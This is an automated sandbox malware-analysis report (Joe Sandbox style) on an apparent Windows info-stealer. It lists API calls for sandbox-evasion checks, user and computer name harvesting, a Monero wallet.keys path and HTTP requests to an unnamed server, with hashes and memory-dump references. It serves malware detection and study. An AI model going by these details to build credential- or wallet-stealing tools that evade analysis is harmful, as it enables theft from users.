                            control_flow_graph 1356 f7500-f754a GetWindowsDirectoryA 1357 f754c 1356->1357 1358 f7553-f75c7 GetVolumeInformationA call f8d00 * 3 1356->1358 1357->1358 1365 f75d8-f75df 1358->1365 1366 f75fc-f7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 f75e1-f75fa call f8d00 1365->1367 1369 f7619-f7626 call fa740 1366->1369 1370 f7628-f7658 wsprintfA call fa740 1366->1370 1367->1365 1377 f767e-f768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000F7542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000F757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F760A
                            • wsprintfA.USER32 ref: 000F7640
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 1fae3e5f43d44cd12e37522cdd0deca783b9fea442f20cbe8aae35652ea4b423
                            • Instruction ID: c0e640dcd4b2f1784a0227b326ad33c2ecbba0c8a173d10b016c4f4e182a25be
                            • Opcode Fuzzy Hash: 1fae3e5f43d44cd12e37522cdd0deca783b9fea442f20cbe8aae35652ea4b423
                            • Instruction Fuzzy Hash: AA41A3B1D0464CABDF21DF94DC45BEEBBB8AF08704F104099F609A7281DB746A44DBA6
                            Function 000F69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,012223B0), ref: 000F98A1
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222218), ref: 000F98BA
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222320), ref: 000F98D2
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222410), ref: 000F98EA
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222350), ref: 000F9903
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01228F88), ref: 000F991B
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01215AD0), ref: 000F9933
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01215C10), ref: 000F994C
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222308), ref: 000F9964
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,012222A8), ref: 000F997C
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222488), ref: 000F9995
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01222230), ref: 000F99AD
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,01215D50), ref: 000F99C5
                              • Part of subcall function 000F9860: GetProcAddress.KERNEL32(74DD0000,012223E0), ref: 000F99DE
                              • Part of subcall function 000FA740: lstrcpy.KERNEL32(00100E17,00000000), ref: 000FA788
                              • Part of subcall function 000E11D0: ExitProcess.KERNEL32 ref: 000E1211
                              • Part of subcall function 000E1160: GetSystemInfo.KERNEL32(?), ref: 000E116A
                              • Part of subcall function 000E1160: ExitProcess.KERNEL32 ref: 000E117E
                              • Part of subcall function 000E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000E112B
                              • Part of subcall function 000E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000E1132
                              • Part of subcall function 000E1110: ExitProcess.KERNEL32 ref: 000E1143
                              • Part of subcall function 000E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000E123E
                              • Part of subcall function 000E1220: __aulldiv.LIBCMT ref: 000E1258
                              • Part of subcall function 000E1220: __aulldiv.LIBCMT ref: 000E1266
                              • Part of subcall function 000E1220: ExitProcess.KERNEL32 ref: 000E1294
                              • Part of subcall function 000F6770: GetUserDefaultLangID.KERNEL32 ref: 000F6774
                              • Part of subcall function 000E1190: ExitProcess.KERNEL32 ref: 000E11C6
                              • Part of subcall function 000F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000E11B7), ref: 000F7880
                              • Part of subcall function 000F7850: RtlAllocateHeap.NTDLL(00000000), ref: 000F7887
                              • Part of subcall function 000F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000F789F
                              • Part of subcall function 000F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7910
                              • Part of subcall function 000F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000F7917
                              • Part of subcall function 000F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000F792F
                              • Part of subcall function 000FA9B0: lstrlen.KERNEL32(?,012291C8,?,\Monero\wallet.keys,00100E17), ref: 000FA9C5
                              • Part of subcall function 000FA9B0: lstrcpy.KERNEL32(00000000), ref: 000FAA04
                              • Part of subcall function 000FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000FAA12
                              • Part of subcall function 000FA8A0: lstrcpy.KERNEL32(?,00100E17), ref: 000FA905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01228F58,?,0010110C,?,00000000,?,00101110,?,00000000,00100AEF), ref: 000F6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000F6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 000F6AF9
                            • Sleep.KERNEL32(00001770), ref: 000F6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01228F58,?,0010110C,?,00000000,?,00101110,?,00000000,00100AEF), ref: 000F6B1A
                            • ExitProcess.KERNEL32 ref: 000F6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 853f0be0bfd70be4f4c258006f1560c5a4fdd74297283d49bcdbef34b5ce2d4c
                            • Instruction ID: 22b8d409044b47cfda9ddad38bfad5886524e3ee32618cca730031cd4c998fec
                            • Opcode Fuzzy Hash: 853f0be0bfd70be4f4c258006f1560c5a4fdd74297283d49bcdbef34b5ce2d4c
                            • Instruction Fuzzy Hash: DF310D70A0420CABDB05F7E0DC56AFE7778AF45340F104528F306A6593DFB05A06E6A6
                            Function 000E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 e1220-e1247 call f89b0 GlobalMemoryStatusEx 1439 e1249-e1271 call fda00 * 2 1436->1439 1440 e1273-e127a 1436->1440 1441 e1281-e1285 1439->1441 1440->1441 1443 e129a-e129d 1441->1443 1444 e1287 1441->1444 1446 e1289-e1290 1444->1446 1447 e1292-e1294 ExitProcess 1444->1447 1446->1443 1446->1447
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000E123E
                            • __aulldiv.LIBCMT ref: 000E1258
                            • __aulldiv.LIBCMT ref: 000E1266
                            • ExitProcess.KERNEL32 ref: 000E1294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 584558b25ef4ba526e5705cec2edee6ee2ee7210378e93b91d1fa374ddfc1780
                            • Instruction ID: 8f8133f6d2becf69113558981bb973e8e57cb3fb0df2a3ec8e43abd057b71b8a
                            • Opcode Fuzzy Hash: 584558b25ef4ba526e5705cec2edee6ee2ee7210378e93b91d1fa374ddfc1780
                            • Instruction Fuzzy Hash: 3B01ADB0D40348BFEF10DBE0CC49BEEBBB8AB40701F208009E704B62C0C7B456519799
                            Function 000F6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 f6af3 1451 f6b0a 1450->1451 1453 f6b0c-f6b22 call f6920 call f5b10 CloseHandle ExitProcess 1451->1453 1454 f6aba-f6ad7 call faad0 OpenEventA 1451->1454 1459 f6ad9-f6af1 call faad0 CreateEventA 1454->1459 1460 f6af5-f6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01228F58,?,0010110C,?,00000000,?,00101110,?,00000000,00100AEF), ref: 000F6ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000F6AE8
                            • CloseHandle.KERNEL32(00000000), ref: 000F6AF9
                            • Sleep.KERNEL32(00001770), ref: 000F6B04
                            • CloseHandle.KERNEL32(?,00000000,?,01228F58,?,0010110C,?,00000000,?,00101110,?,00000000,00100AEF), ref: 000F6B1A
                            • ExitProcess.KERNEL32 ref: 000F6B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 48617f125728e43b2dfdae651949b24b631c3aaa924407bc5133e33e2409e0ee
                            • Instruction ID: d89d26cae8bf398ca0b65834ccd98f2272f18d6abde37495c5d8a2f8f035392d
                            • Opcode Fuzzy Hash: 48617f125728e43b2dfdae651949b24b631c3aaa924407bc5133e33e2409e0ee
                            • Instruction Fuzzy Hash: DDF05E70A4020DABE721ABA0DC1ABBE7B78EF04701F104518F713E19C2CBB15541FA57
                            Function 000E47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000E4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 000E4849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 20bdebd19cbc9d71065776cc2287ba823b9e3d978fc0020b0921a8c4a945b03e
                            • Instruction ID: cc81688010514534fa31dad8a03c98ce91e86c0619dd34b7f6ac88d414b36e48
                            • Opcode Fuzzy Hash: 20bdebd19cbc9d71065776cc2287ba823b9e3d978fc0020b0921a8c4a945b03e
                            • Instruction Fuzzy Hash: B72142B1D00209ABDF14DFA4E845ADD7774FB45310F108625F519A72C1DB706609DF92
                            Function 000F51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 000FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000FA7E6
                              • Part of subcall function 000E6280: InternetOpenA.WININET(00100DFE,00000001,00000000,00000000,00000000), ref: 000E62E1
                              • Part of subcall function 000E6280: StrCmpCA.SHLWAPI(?,0122E878), ref: 000E6303
                              • Part of subcall function 000E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000E6335
                              • Part of subcall function 000E6280: HttpOpenRequestA.WININET(00000000,GET,?,0122E458,00000000,00000000,00400100,00000000), ref: 000E6385
                              • Part of subcall function 000E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000E63BF
                              • Part of subcall function 000E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000E63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000F5228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: e44451ebc4816bdea298405b77f93372a55e074f374bfe93399e5088bd9a6065
                            • Instruction ID: a7c0b5e7ef8a3932c733ed56872167b47202121b705dec435ef0115a5e751743
                            • Opcode Fuzzy Hash: e44451ebc4816bdea298405b77f93372a55e074f374bfe93399e5088bd9a6065
                            • Instruction Fuzzy Hash: 5C111F70A0054CABCB14FF60DD52AFD7338AF51340F408158FA0E5A993EF746B0AD692
                            Function 000F78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F7910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000F7917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 000F792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 2c71eb02c1579684f99239b02e03d609601841b57d3f7e5d56c4f9f873a96cb9
                            • Instruction ID: 3ec2a951ab87ea4ec7dce97030c8ca44077afea66da2cbd5bb85616962d4757c
                            • Opcode Fuzzy Hash: 2c71eb02c1579684f99239b02e03d609601841b57d3f7e5d56c4f9f873a96cb9
                            • Instruction Fuzzy Hash: 570186B1A08609EBC710DF94DD45BAEBBBCF704B11F10421AFA45E3680C77459018BA2
                            Function 000E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000E112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 000E1132
                            • ExitProcess.KERNEL32 ref: 000E1143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729439372.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729549501.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729565400.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 7491071f18a9ec7394fc5588d7feec8139cb913b9a1d6a326310f1659ed8a2b8
                            • Instruction ID: 0ea6914ad5c1ea0e7c6754fcc813622654b994ab690d835a41455bbc6b4c68a5
                            • Opcode Fuzzy Hash: 7491071f18a9ec7394fc5588d7feec8139cb913b9a1d6a326310f1659ed8a2b8
                            • Instruction Fuzzy Hash: 50E08670945348FFE7206BA19C0AB4C7ABCAB04B01F100048F709B61C0C6B426019699
                            Function 000E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000E10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000E10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728987050.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                            • Associated: 00000000.00000002.1728957771.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000019D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.00000000001C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1728987050.000000000032A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729168097.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
